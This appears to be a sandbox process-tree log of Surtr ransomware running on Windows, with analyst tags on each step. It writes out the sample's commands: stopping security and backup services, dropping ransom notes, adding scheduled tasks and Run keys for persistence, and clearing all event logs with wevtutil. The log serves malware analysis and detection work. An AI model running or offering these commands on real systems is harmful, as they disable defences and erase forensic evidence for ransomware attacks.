C:\Windows\system32\net.exenet stop "BackupExecVSSProvider"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecVSSProvider"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "EPSecurityService"3⤵
-
C:\Windows\system32\net.exenet stop "EPSecurityService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "EPSecurityService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "IISAdmin"3⤵
-
C:\Windows\system32\net.exenet stop "IISAdmin"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "IISAdmin"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"3⤵
-
C:\Windows\system32\attrib.exeattrib +R /S "C:\ProgramData\Service"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"3⤵
-
C:\Windows\system32\net.exenet stop "IMAP4Svc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "IMAP4Svc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"3⤵
-
C:\Windows\system32\attrib.exeattrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "macmnsvc"3⤵
-
C:\Windows\system32\net.exenet stop "macmnsvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "macmnsvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F3⤵
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F4⤵
- Creates scheduled task(s)
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "masvc"
  C:\Windows\system32\net.exe | net stop "masvc"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "masvc"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
  C:\Windows\system32\schtasks.exe | schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
    - Creates scheduled task(s)
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MBAMService"
  C:\Windows\system32\net.exe | net stop "MBAMService"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MBAMService"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  C:\Windows\system32\reg.exe | reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"
  C:\Windows\system32\net.exe | net stop "MBEndpointAgent"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  C:\Windows\system32\reg.exe | reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    - Adds Run key to start application
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  C:\Windows\system32\reg.exe | reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    - Adds Run key to start application
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"
  C:\Windows\system32\net.exe | net stop "McAfeeEngineService"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "McAfeeEngineService"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  C:\Windows\system32\reg.exe | reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"
  C:\Windows\system32\net.exe | net stop "McAfeeFramework"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "McAfeeFramework"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Private_DATA.surt" "%USERPROFILE%\Desktop\Private_DATA.surt"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"
  C:\Windows\system32\net.exe | net stop "McAfeeFrameworkMcAfeeFramework"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\ID_DATA.surt" "%USERPROFILE%\Desktop\ID_DATA.surt"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\SURTR_README.hta" "%USERPROFILE%\Desktop\SURTR_README.hta"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Service\SURTR_README.txt" "%USERPROFILE%\Desktop\SURTR_README.txt"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "McShield"
  C:\Windows\system32\net.exe | net stop "McShield"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "McShield"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
  C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c wevtutil.exe el
    C:\Windows\system32\wevtutil.exe | wevtutil.exe el
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "AirSpaceChannel"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Analytic"
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Application"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "DirectShowFilterGraph"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "DirectShowPluginControl"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Els_Hyphenation/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "EndpointMapper"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "FirstUXPerf-Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "ForwardedEvents"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "General Logging"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "HardwareEvents"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "IHM_DebugChannel"
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Internet Explorer"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Key Management Service"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "MedaFoundationVideoProc"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "MedaFoundationVideoProcD3D"
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "MediaFoundationAsyncWrapper"
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "MediaFoundationContentProtection"
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "MediaFoundationDS"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "MediaFoundationDeviceProxy"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "MediaFoundationMediaEngine"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "MediaFoundationPerformance"
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "MediaFoundationPerformanceCore"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "MediaFoundationPipeline"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "MediaFoundationPlatform"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "MediaFoundationSrcPrefetch"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-AppV-Client/Admin"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-AppV-Client/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-AppV-Client/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-IE/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AAD/Analytic"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AAD/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-ASN1/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppHost/Admin"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppHost/Internal"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppSruProv"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-ApplicationResourceManagementSystem/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-ApplicationResourceManagementSystem/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Audio/Informational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Backup"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-COM/Call"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CloudStorageWizard/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CloudStorageWizard/Operational"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
